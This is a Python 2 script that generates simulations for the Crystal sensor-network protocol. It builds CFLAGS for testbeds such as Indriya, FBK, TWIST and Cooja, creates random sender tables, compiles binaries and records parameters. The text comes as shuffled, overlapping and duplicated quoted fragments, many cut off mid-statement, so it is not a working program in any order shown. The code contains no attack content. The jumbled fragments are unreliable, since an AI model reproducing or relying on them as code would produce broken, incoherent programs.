new_env glb = {} pars =", "os from collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback", "+ nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f:", "p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"]", "r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = []", "(\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags +=", "help='Configuration python file') args = ap.parse_args() import os from collections import namedtuple, OrderedDict", "= l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders,", "cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt =", "cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars", "sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for", "\"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None,", "\"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload,", "f: for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink", "raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes if", "_ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] =", "else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"]", "uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir,", "f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum =", "l = 0 r = [] while (l<n): x = random.choice(nodes) if x", "src.items(): if k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm", "open(nodemap_txt) as f: for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0]))", "n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap", "= \" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\")", "cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty =", "if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed ==", "p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"]", "required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args =", "[\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags +=", "1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is", "os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as", "\"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs,", "= full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for x in", "\"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y,", "with open(\"nodelist.txt\") as f: for l in f: l = l.strip() if l:", "= args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath", "os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist,", "copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags", "0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels,", "= cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] =", "simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print", "if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty,", "p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"]", "def set_defaults(dst, src): for k,v in src.items(): if k not in dst: dst[k]", "[\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags", "try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\")", "start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period", "!= \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as", "f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise", "print \"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\"", "os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\")", "\"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path", "random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t", "\"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a,", "not in r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs):", "if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags +=", "!= \"all\": with open(nodemap_txt) as f: for l in f: l = l.strip()", "+= [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if", "in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\",", "cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else:", "= set() with open(\"nodelist.txt\") as f: for l in f: l = l.strip()", "l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink", "mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if", "p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"]", "\"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f:", "for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[]", "for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not", "n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s,", "\"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack,", "values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum", "traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False,", "try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node", "= 0 r = [] while (l<n): x = random.choice(nodes) if x not", "globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f:", "l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if", "+= [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env", "file') args = ap.parse_args() import os from collections import namedtuple, OrderedDict from shutil", "\".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\")", "f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir)", "if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"),", "[\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in", "for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception,", "= ap.parse_args() import os from collections import namedtuple, OrderedDict from shutil import copy,", "as f: for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if", "cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a,", "p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \"", "[\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env =", "in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags", "sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z", "\"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed", "glb = {} pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for", "in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x)", "\"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags", "+= [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags", "in src.items(): if k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\",", "nodemap != \"all\": with open(nodemap_txt) as f: for l in f: l =", "= num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] =", "= argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration", "n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty,", "in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca)", "r = [] while (l<n): x = random.choice(nodes) if x not in r:", "os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0 r = []", "not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with", "p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"]", "x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32,", "nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map", "= dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] =", "p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"]", "f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise", "r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl =", "channel, sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch,", "nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does", "dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs,", "+= rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in", "defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)],", "in r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl", "n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm,", "period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t", "sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap,", "and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" + nodemap_txt)", "= n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] =", "x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs,", "CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults", "n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm", "import sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\",", "= OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] =", "except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f:", "channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y,", "r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not None:", "= longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] =", "CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t,", "= \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack,", "mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink,", "= CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s,", "\"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes", "random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\",", "= mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env)", "testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"]", "traceback import subprocess import itertools import re import random basepath = args.basepath #apppath", "= len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] =", "if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\",", "copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders,", "\"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {}", "== \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\",", "full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if", "\"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using", "= l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node", "if seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes,", "set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for l in f:", "n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack", "testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags +=", "dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt", "\"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True,", "new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname +", "len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed", "\"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed", "abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname +", "\"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x,", "rnd_unique(nodes, n): l = 0 r = [] while (l<n): x = random.choice(nodes)", "n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if", "p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"]", "for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env):", "{\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params, glb, pars) def", "num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power", "\" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars = {}", "new_env glb = {} pars = {} execfile(params, glb, pars) def set_defaults(dst, src):", "os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir,", "seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs)", "p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"]", "\"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the", "args = ap.parse_args() import os from collections import namedtuple, OrderedDict from shutil import", "does not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\":", "p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"]", "= namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2,", "= {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items(): if", "sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s", "os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name =", "simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in", "= os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name", "simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a,", "cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\"))", "full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()])", "nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap !=", "cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a,", "itertools import re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\")", "simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power,", "l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty, cca,", "= random.choice(nodes) if x not in r: r.append(x) l += 1 return r", "in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc()", "while (l<n): x = random.choice(nodes) if x not in r: r.append(x) l +=", "all_senders, active_epochs, 